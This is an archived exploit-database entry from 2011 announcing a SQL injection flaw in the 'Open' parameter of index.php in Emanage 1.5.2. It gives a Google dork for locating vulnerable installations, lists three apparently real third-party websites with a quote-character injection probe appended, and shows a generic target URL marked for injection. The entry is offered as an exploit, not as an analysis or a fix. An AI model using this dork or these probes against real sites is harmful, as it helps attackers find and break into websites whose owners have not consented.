Emanage1.5.2 (index.php) sql Injection Vulnerability

2011-07-07T00:00:00
ID 1337DAY-ID-16493
Type zdt
Reporter Angel Injection
Modified 2011-07-07T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Exploit Title:Emanage1.5.2(index.php)sql Injection Vulnerability                   >
                                                                                     >
# Date: 7/7/2011                                                                     >
                                                                                     >
# Author: Angel Injection                                                            >
                                                                                     >
# home Page: http://www.club-h.co.cc , http://dev-point.com , http://alqobor.com     >
                                                                                     >
# Email: Angel-Injection[at]hotmail.com                                              >
                                                                                     >
# Google Dork: intitle:intext:Powered by Emanage® Version 1.5.4 inurl:index.php?Open >
                                                                                     >
# Category:: webapps                                                                 >
                                                                                     >
# Vendor or Software Link: http://em.com.eg                                          >
                                                                                     >
# Version : 1.5.2                                                                      >

                                                                                     >
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Demo Site
http://www.maadionline.com/index.php?Open=1%27
http://72.232.245.226/~maadi/index.php?Open=1%27
http://nuestrocasa.com/index.php?Open=1%27


Exploits

Http://Target/[path]/index.php?Open=1'

Demo
http://Target/[path]/index.php?Open=1 Injection Here




#  0day.today [2018-04-01]  #